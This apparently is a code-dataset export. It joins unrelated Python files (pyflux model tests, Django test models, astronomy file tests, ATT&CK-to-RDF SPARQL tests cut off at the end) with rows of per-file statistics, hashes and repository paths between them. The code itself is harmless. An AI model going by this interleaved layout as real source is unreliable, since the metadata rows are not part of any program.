    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.add_second_component("HQB", "AQB")
    model.fit()  # unused `x =` assignment removed
    # Second component adds one latent variable (3 -> 4).
    assert(len(model.latent_variables.z_list) == 4)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
    prediction = model.predict("Denver Broncos", "Carolina Panthers", "Peyton Manning", "Cam Newton", neutral=True)
    assert(len(prediction[np.isnan(prediction)]) == 0)
def test_t_mle():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.t())
    model.fit()  # unused `x =` assignment removed
    # t family carries an extra latent variable compared to Normal (3 -> 4).
    assert(len(model.latent_variables.z_list) == 4)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_pml():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.t())
    model.fit('PML')  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 4)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_laplace():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.t())
    model.fit('Laplace')  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 4)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_bbvi():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.t())
    model.fit('BBVI', iterations=100)  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 4)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_predict():
    """Tests that a neutral-site prediction with the t family has no nan values."""
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.t())
    model.fit()
    prediction = model.predict("Denver Broncos", "Carolina Panthers", neutral=True)
    assert(not np.isnan(prediction).any())
def test_t_mle_two_components():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    # Truncated to 300 rows to keep the BBVI fit fast.
    model = pf.GASRank(data=data.iloc[0:300,:], team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.t())
    model.add_second_component("HQB", "AQB")
    model.fit('BBVI', iterations=50, map_start=False)  # unused `x =` assignment removed
    # t family (4) plus the second component's latent variable (-> 5).
    assert(len(model.latent_variables.z_list) == 5)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
    prediction = model.predict("Denver Broncos", "Carolina Panthers", "Peyton Manning", "Cam Newton", neutral=True)
    assert(len(prediction[np.isnan(prediction)]) == 0)
| 40.0375
| 111
| 0.657821
| 929
| 6,406
| 4.413348
| 0.108719
| 0.120732
| 0.107317
| 0.112683
| 0.955854
| 0.952439
| 0.952439
| 0.944146
| 0.944146
| 0.930244
| 0
| 0.013007
| 0.19591
| 6,406
| 159
| 112
| 40.289308
| 0.782955
| 0.168124
| 0
| 0.78
| 0
| 0
| 0.123681
| 0
| 0
| 0
| 0
| 0
| 0.26
| 1
| 0.13
| false
| 0
| 0.03
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12c26cc135266103ed50c9adbd6b9bf925ff1a3f
| 518
|
py
|
Python
|
coba/exceptions.py
|
anrath/coba
|
635fd21306f52b27e7f5d78ee05148e6934e3d38
|
[
"BSD-3-Clause"
] | null | null | null |
coba/exceptions.py
|
anrath/coba
|
635fd21306f52b27e7f5d78ee05148e6934e3d38
|
[
"BSD-3-Clause"
] | null | null | null |
coba/exceptions.py
|
anrath/coba
|
635fd21306f52b27e7f5d78ee05148e6934e3d38
|
[
"BSD-3-Clause"
] | null | null | null |
class CobaException(Exception):
    """Exception that stays quiet in Jupyter notebooks."""

    def _render_traceback_(self):
        # Jupyter Notebook calls this hook when rendering a traceback; making
        # it a no-op keeps CobaException from printing one in notebooks.
        return None
class CobaFatal(Exception):
    def _render_traceback_(self):
        #This is a special method used by Jupyter Notebook for writing tracebacks
        #By dummying it up we can prevent CobaFatal from writing tracebacks in Jupyter Notebook
        pass
| 47.090909
| 99
| 0.741313
| 68
| 518
| 5.558824
| 0.426471
| 0.15873
| 0.095238
| 0.142857
| 0.915344
| 0.915344
| 0.915344
| 0.915344
| 0.915344
| 0.915344
| 0
| 0
| 0.227799
| 518
| 11
| 100
| 47.090909
| 0.945
| 0.625483
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
12ea95c6949b3a9e841a04dfa53750628bac45d4
| 561
|
py
|
Python
|
Codewars/8kyu/total-amount-of-points/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/8kyu/total-amount-of-points/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/8kyu/total-amount-of-points/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
Test.describe('Basic Tests')

# (match results, expected total points) — 3 per win, 1 per draw, 0 per loss.
fixtures = [
    (['1:0', '2:0', '3:0', '4:0', '2:1', '3:1', '4:1', '3:2', '4:2', '4:3'], 30),
    (['1:1', '2:2', '3:3', '4:4', '2:2', '3:3', '4:4', '3:3', '4:4', '4:4'], 10),
    (['0:1', '0:2', '0:3', '0:4', '1:2', '1:3', '1:4', '2:3', '2:4', '3:4'], 0),
    (['1:0', '2:0', '3:0', '4:0', '2:1', '1:3', '1:4', '2:3', '2:4', '3:4'], 15),
    (['1:0', '2:0', '3:0', '4:4', '2:2', '3:3', '1:4', '2:3', '2:4', '3:4'], 12),
]
for games, expected in fixtures:
    Test.assert_equals(points(games), expected)
| 62.333333
| 102
| 0.454545
| 133
| 561
| 1.879699
| 0.135338
| 0.048
| 0.32
| 0.44
| 0.688
| 0.58
| 0.516
| 0.488
| 0.488
| 0.452
| 0
| 0.224449
| 0.110517
| 561
| 8
| 103
| 70.125
| 0.276553
| 0.024955
| 0
| 0
| 0
| 0
| 0.295413
| 0
| 0
| 0
| 0
| 0
| 0.833333
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
421865f8299ab808a678c8ce7bb62d98d6c6f1fd
| 162
|
py
|
Python
|
src/lk_db/ents/both/census/EntOccupationStatusOfHousingUnits.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
src/lk_db/ents/both/census/EntOccupationStatusOfHousingUnits.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
src/lk_db/ents/both/census/EntOccupationStatusOfHousingUnits.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
# Auto Generated - DO NOT EDIT!
from lk_db.ents.both.EntCensusResult import EntCensusResult
class EntOccupationStatusOfHousingUnits(EntCensusResult):
    # Marker subclass: all behaviour is inherited from EntCensusResult.
    pass
| 20.25
| 59
| 0.814815
| 17
| 162
| 7.705882
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 162
| 7
| 60
| 23.142857
| 0.929078
| 0.179012
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
4277cac795635e21cc02ce41499a70e40be9f030
| 127
|
py
|
Python
|
pylox/grammar/__init__.py
|
classabbyamp/pylox
|
c2dc991603f5e59d8655fbae2cbad283ea388de6
|
[
"BSD-3-Clause"
] | null | null | null |
pylox/grammar/__init__.py
|
classabbyamp/pylox
|
c2dc991603f5e59d8655fbae2cbad283ea388de6
|
[
"BSD-3-Clause"
] | null | null | null |
pylox/grammar/__init__.py
|
classabbyamp/pylox
|
c2dc991603f5e59d8655fbae2cbad283ea388de6
|
[
"BSD-3-Clause"
] | null | null | null |
from . import token # noqa: F401
from . import expression as expr # noqa: F401
from . import statement as stmt # noqa: F401
| 31.75
| 46
| 0.708661
| 19
| 127
| 4.736842
| 0.526316
| 0.333333
| 0.266667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0.220472
| 127
| 3
| 47
| 42.333333
| 0.818182
| 0.251969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
427e0393c565ee3336b63ce515c91416c571a286
| 10,464
|
py
|
Python
|
nested_admin/tests/admin_widgets/models.py
|
pasevin/django-nested-admin
|
5fee72ca74b79863bdc2a102aa47282dd6b770c9
|
[
"BSD-2-Clause"
] | null | null | null |
nested_admin/tests/admin_widgets/models.py
|
pasevin/django-nested-admin
|
5fee72ca74b79863bdc2a102aa47282dd6b770c9
|
[
"BSD-2-Clause"
] | null | null | null |
nested_admin/tests/admin_widgets/models.py
|
pasevin/django-nested-admin
|
5fee72ca74b79863bdc2a102aa47282dd6b770c9
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import unicode_literals
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import ForeignKey, CASCADE
from nested_admin.tests.compat import python_2_unicode_compatible
class WidgetsRoot(models.Model):
    # Top of the Widgets* hierarchy; WidgetsA rows attach here via `parent`.
    name = models.CharField(max_length=200)
@python_2_unicode_compatible
class WidgetsRelated1(models.Model):
    """Target of the fk1/fk2 ForeignKeys on the Widgets* models below."""
    name = models.CharField(max_length=200)

    def __str__(self):
        return self.name

    def related_label(self):
        # Label shown by related-object widgets instead of str(self).
        return self.name

    @staticmethod
    def autocomplete_search_fields():
        # Lookup used by autocomplete widgets when searching this model.
        return ("name__icontains", )


@python_2_unicode_compatible
class WidgetsRelated2(models.Model):
    """Target of the fk3/fk4 ForeignKeys; newest rows first by default."""
    name = models.CharField(max_length=200)
    date_created = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['-date_created']

    def __str__(self):
        return self.name

    def related_label(self):
        return self.name

    @staticmethod
    def autocomplete_search_fields():
        return ("name__icontains", )
@python_2_unicode_compatible
class WidgetsM2M(models.Model):
    # Target of the `m2m` ManyToManyField on the Widgets* models.
    name = models.CharField(max_length=200)

    def __str__(self):
        return self.name


@python_2_unicode_compatible
class WidgetsM2MTwo(models.Model):
    # Target of `m2m_two`; also exposes the related-widget hooks below.
    name = models.CharField(max_length=200)

    def __str__(self):
        return self.name

    def related_label(self):
        return self.name

    @staticmethod
    def autocomplete_search_fields():
        return ("name__icontains", )


@python_2_unicode_compatible
class WidgetsM2MThree(models.Model):
    # Target of `m2m_three`.
    name = models.CharField(max_length=200)

    def __str__(self):
        return self.name

    def related_label(self):
        return self.name

    @staticmethod
    def autocomplete_search_fields():
        return ("name__icontains", )
@python_2_unicode_compatible
class WidgetsA(models.Model):
    """Child of WidgetsRoot combining FK, M2M, generic-relation, file and
    date fields (field mix mirrored by WidgetsB/C0/C1)."""
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetsRoot, on_delete=CASCADE)
    position = models.PositiveIntegerField()
    date = models.DateTimeField(blank=True, null=True)
    upload = models.FileField(blank=True, null=True, upload_to='foo')
    fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    m2m = models.ManyToManyField(WidgetsM2M, blank=True)
    m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
    m2m_three = models.ManyToManyField(WidgetsM2MThree, blank=True)
    # Generic relation #1 — relies on GenericForeignKey's default field names.
    content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
    object_id = models.PositiveIntegerField(null=True, blank=True)
    content_object = GenericForeignKey()
    # Generic relation #2 — explicitly named ct/id fields.
    relation_type = ForeignKey(ContentType, null=True, blank=True,
                               on_delete=CASCADE, related_name='+')
    relation_id = models.PositiveIntegerField(null=True, blank=True)
    relation_object = GenericForeignKey('relation_type', 'relation_id')

    class Meta:
        ordering = ('position', )

    def __str__(self):
        return self.name
@python_2_unicode_compatible
class WidgetsB(models.Model):
    """Child of WidgetsA; same field mix as WidgetsA but names its
    GenericForeignKey fields explicitly."""
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetsA, on_delete=CASCADE)
    position = models.PositiveIntegerField()
    date = models.DateTimeField(blank=True, null=True)
    upload = models.FileField(blank=True, null=True, upload_to='foo')
    fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    m2m = models.ManyToManyField(WidgetsM2M, blank=True)
    m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
    m2m_three = models.ManyToManyField(WidgetsM2MThree, blank=True)
    content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
    object_id = models.PositiveIntegerField(null=True, blank=True)
    content_object = GenericForeignKey('content_type', 'object_id')
    relation_type = ForeignKey(ContentType, null=True, blank=True,
                               on_delete=CASCADE, related_name='+')
    relation_id = models.PositiveIntegerField(null=True, blank=True)
    relation_object = GenericForeignKey('relation_type', 'relation_id')

    class Meta:
        ordering = ('position', )

    def __str__(self):
        # Include the parent for disambiguation; '?' guards a missing parent.
        parent_name = self.parent.name if self.parent else '?'
        return "%s - %s" % (parent_name, self.name)
@python_2_unicode_compatible
class WidgetsC0(models.Model):
    """First third-level child of WidgetsB (same field mix as WidgetsA)."""
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetsB, on_delete=CASCADE)
    position = models.PositiveIntegerField()
    date = models.DateTimeField(blank=True, null=True)
    upload = models.FileField(blank=True, null=True, upload_to='foo')
    fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    m2m = models.ManyToManyField(WidgetsM2M, blank=True)
    m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
    m2m_three = models.ManyToManyField(WidgetsM2MThree, blank=True)
    content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
    object_id = models.PositiveIntegerField(null=True, blank=True)
    content_object = GenericForeignKey()
    relation_type = ForeignKey(ContentType, null=True, blank=True,
                               on_delete=CASCADE, related_name='+')
    relation_id = models.PositiveIntegerField(null=True, blank=True)
    relation_object = GenericForeignKey('relation_type', 'relation_id')

    class Meta:
        ordering = ('position', )

    def __str__(self):
        parent_name = self.parent.name if self.parent else '?'
        return "%s - %s" % (parent_name, self.name)
@python_2_unicode_compatible
class WidgetsC1(models.Model):
    """Second third-level child of WidgetsB; reduced field set (no
    m2m_three and no second generic relation)."""
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetsB, on_delete=CASCADE)
    position = models.PositiveIntegerField()
    date = models.DateTimeField(blank=True, null=True)
    upload = models.FileField(blank=True, null=True, upload_to='foo')
    fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    m2m = models.ManyToManyField(WidgetsM2M, blank=True)
    m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
    content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
    object_id = models.PositiveIntegerField(null=True, blank=True)
    content_object = GenericForeignKey()

    class Meta:
        ordering = ('position', )

    def __str__(self):
        parent_name = self.parent.name if self.parent else '?'
        return "%s - %s" % (parent_name, self.name)
class WidgetMediaOrderRoot(models.Model):
    # Top of the WidgetMediaOrder* hierarchy (Root -> A -> B -> C0/C1).
    name = models.CharField(max_length=200)


@python_2_unicode_compatible
class WidgetMediaOrderA(models.Model):
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetMediaOrderRoot, on_delete=CASCADE)
    position = models.PositiveIntegerField()

    class Meta:
        ordering = ('position', )

    def __str__(self):
        return self.name


@python_2_unicode_compatible
class WidgetMediaOrderB(models.Model):
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetMediaOrderA, on_delete=CASCADE)
    position = models.PositiveIntegerField()

    class Meta:
        ordering = ('position', )

    def __str__(self):
        # '?' guards against a missing parent.
        parent_name = self.parent.name if self.parent else '?'
        return "%s - %s" % (parent_name, self.name)


@python_2_unicode_compatible
class WidgetMediaOrderC0(models.Model):
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetMediaOrderB, on_delete=CASCADE)
    position = models.PositiveIntegerField()

    class Meta:
        ordering = ('position', )

    def __str__(self):
        parent_name = self.parent.name if self.parent else '?'
        return "%s - %s" % (parent_name, self.name)


@python_2_unicode_compatible
class WidgetMediaOrderC1(models.Model):
    # Unlike its siblings, this leaf also carries widget-bearing fields
    # (date/file/FK/M2M).
    name = models.CharField(max_length=200)
    slug = models.SlugField()
    parent = ForeignKey(WidgetMediaOrderB, on_delete=CASCADE)
    position = models.PositiveIntegerField()
    date = models.DateTimeField(blank=True, null=True)
    upload = models.FileField(blank=True, null=True, upload_to='foo')
    fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
                            on_delete=CASCADE, related_name='+')
    m2m = models.ManyToManyField(WidgetsM2M, blank=True)

    class Meta:
        ordering = ('position', )

    def __str__(self):
        parent_name = self.parent.name if self.parent else '?'
        return "%s - %s" % (parent_name, self.name)
| 34.996656
| 84
| 0.713876
| 1,200
| 10,464
| 6.016667
| 0.076667
| 0.069806
| 0.072715
| 0.070637
| 0.917867
| 0.91385
| 0.91385
| 0.91385
| 0.908033
| 0.908033
| 0
| 0.015292
| 0.175076
| 10,464
| 298
| 85
| 35.114094
| 0.821131
| 0
| 0
| 0.878261
| 0
| 0
| 0.030199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091304
| false
| 0
| 0.026087
| 0.065217
| 0.76087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
42a0f3932e2fc3c9bb0a43ec07d36a2d59283f46
| 3,779
|
py
|
Python
|
soar_instruments/test/test_sami.py
|
soar-telescope/dragons-soar
|
a1c600074f532c1af6bd59bc2cc662a1aecd39c4
|
[
"MIT"
] | 1
|
2017-10-31T21:02:59.000Z
|
2017-10-31T21:02:59.000Z
|
soar_instruments/test/test_sami.py
|
soar-telescope/dragons-soar
|
a1c600074f532c1af6bd59bc2cc662a1aecd39c4
|
[
"MIT"
] | null | null | null |
soar_instruments/test/test_sami.py
|
soar-telescope/dragons-soar
|
a1c600074f532c1af6bd59bc2cc662a1aecd39c4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import glob
import os
import unittest
import soar_instruments
import soardr
import astrodata
class Test_IO(unittest.TestCase):
    """Check that the bundled SAMI sample FITS files open in astrodata and
    carry the expected tags.

    Fixes over the previous version: test_bias now uses self.assertTrue like
    its siblings (a bare ``assert`` is stripped under ``python -O`` and gives
    poorer failure output), docstring typos are corrected, and the repeated
    exists/open/tag-check sequence is factored into private helpers.
    """

    # Directory holding the sample FITS files used by every test.
    path = "soar_instruments/test/data/"

    def _open_sample(self, file_name):
        # Resolve the sample file, assert it exists, then open it in astrodata.
        sample = os.path.join(self.path, file_name)
        self.assertTrue(os.path.exists(sample))
        return astrodata.open(sample)

    def _assert_tags(self, ad, *tags):
        # Assert every expected tag is present on the opened file.
        for tag in tags:
            self.assertIn(tag, ad.tags)

    def test_acq(self):
        """
        Check that a DOMEFLAT acquisition obtained with SAMI is read correctly
        and that the tags are set properly.
        """
        ad = self._open_sample("sami_acq.fits")
        self._assert_tags(ad, 'SOAR', 'SAM', 'SAMI', 'IMAGE')

    def test_bias(self):
        """
        Check that a BIAS obtained with SAMI is read correctly and that the
        tags are set properly.
        """
        ad = self._open_sample("sami_bias.fits")
        self._assert_tags(ad, 'SOAR', 'SAM', 'SAMI', 'CAL', 'BIAS')

    def test_domeflat(self):
        """
        Check that a DOMEFLAT obtained with SAMI is read correctly and that
        the tags are set properly.
        """
        ad = self._open_sample("sami_domeflat.fits")
        self._assert_tags(ad, 'SOAR', 'SAM', 'SAMI', 'CAL', 'FLAT')

    def test_object(self):
        """
        Check that an OBJECT obtained with SAMI is read correctly and that
        the tags are set properly.
        """
        ad = self._open_sample("sami_object.fits")
        self._assert_tags(ad, 'SOAR', 'SAM', 'SAMI', 'IMAGE')

    def test_sky_flat(self):
        """
        Check that a SKYFLAT obtained with SAMI is read correctly and that
        the tags are set properly.
        """
        ad = self._open_sample("sami_skyflat.fits")
        self._assert_tags(ad, 'SOAR', 'SAM', 'SAMI', 'CAL', 'FLAT')
class Test_Attributes(unittest.TestCase):
    """Smoke-test descriptor access on every bundled SAMI sample file."""

    # Directory holding the SAMI sample FITS files.
    path = "soar_instruments/test/data/"

    def _sami_files(self):
        # All SAMI sample files shipped with the test data.
        return glob.glob(os.path.join(self.path, "sami_*.fits"))

    def test_datasec(self):
        for file_name in self._sami_files():
            astrodata.open(file_name).data_section()

    def test_filters(self):
        for file_name in self._sami_files():
            astrodata.open(file_name).filter_name()

    def test_gain(self):
        for file_name in self._sami_files():
            astrodata.open(file_name).gain()
| 27.384058
| 80
| 0.598042
| 511
| 3,779
| 4.34638
| 0.135029
| 0.124268
| 0.081045
| 0.14588
| 0.841963
| 0.824403
| 0.769023
| 0.769023
| 0.742909
| 0.642503
| 0
| 0.000372
| 0.289495
| 3,779
| 137
| 81
| 27.583942
| 0.826816
| 0.218576
| 0
| 0.544118
| 0
| 0
| 0.089229
| 0.019197
| 0
| 0
| 0
| 0
| 0.411765
| 1
| 0.117647
| false
| 0
| 0.088235
| 0
| 0.264706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35f240493656ab1e0c8a0fcde9c981bc68a935eb
| 53,282
|
py
|
Python
|
tests/test_rdf_transformation.py
|
mswimmer/AttackModel
|
62e03c29def7c6d45cbd8591412731afab987537
|
[
"MIT"
] | null | null | null |
tests/test_rdf_transformation.py
|
mswimmer/AttackModel
|
62e03c29def7c6d45cbd8591412731afab987537
|
[
"MIT"
] | null | null | null |
tests/test_rdf_transformation.py
|
mswimmer/AttackModel
|
62e03c29def7c6d45cbd8591412731afab987537
|
[
"MIT"
] | null | null | null |
import pytest
from attackmodel import rdf
from rdflib.plugins.sparql import prepareQuery
from rdflib.namespace import RDF, RDFS, XSD, DC, DCTERMS, FOAF, SKOS
def get_model(infile, title, rdf_class):
    """Load one STIX file into a fresh AttackModel, convert it to RDF,
    and return the converted model."""
    attack_model = rdf.AttackModel()
    attack_model.load_stix(
        file_name=infile,
        url="file://" + infile,
        title=title,
        rdf_class=rdf_class,
    )
    attack_model.convert()
    return attack_model
# pytest fixtures: each one loads a single STIX sample from tests/data/,
# converts it to RDF via get_model, and yields the resulting model.
@pytest.fixture()
def attack_pattern():
    yield get_model(infile='tests/data/attack-pattern-1.json', title='attack-pattern-1', rdf_class=rdf.CTI['EnterpriseCatalog'])


@pytest.fixture()
def intrusion_set():
    yield get_model(infile='tests/data/intrusion-set-1.json', title='intrusion-set-1', rdf_class=rdf.CTI['EnterpriseCatalog'])


@pytest.fixture()
def relationship():
    yield get_model(infile='tests/data/relationship-1.json', title='relationship-1', rdf_class=rdf.CTI['EnterpriseCatalog'])


@pytest.fixture()
def course_of_action():
    yield get_model(infile='tests/data/course-of-action-1.json', title='course-of-action-1', rdf_class=rdf.CTI['EnterpriseCatalog'])


@pytest.fixture()
def pre():
    # Unlike the other fixtures, this one loads into the PreCatalog class.
    yield get_model(infile='tests/data/pre-1.json', title='pre-1', rdf_class=rdf.CTI['PreCatalog'])
def ask(model, asking):
    """Wrap *asking* in a SPARQL ASK query, bind the project namespaces,
    and run it against the model's graph."""
    namespaces = {
        "cti": rdf.CTI,
        "dcterms": DCTERMS,
        "dc": DC,
        "attack": model.ns,
        "core": rdf.CORE,
        "foaf": FOAF,
        "skos": SKOS,
    }
    query = prepareQuery("ASK { " + asking + " }", initNs=namespaces)
    return model.graph.query(query)
########
# SPARQL ASK probes against the converted attack-pattern-1.json fixture.
# Each test passes iff the stated triple pattern exists in the graph.

def test_exists_enterprise_catalog_id(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:EnterpriseCatalog .")
    assert bool(qres)


def test_attack_pattern_id(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:identifier \"attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7\" .")
    assert bool(qres)


def test_attack_pattern_created(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:created \"2020-03-02T19:15:44.182000+00:00\"^^xsd:dateTime .")
    assert bool(qres)


def test_attack_pattern_creator(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
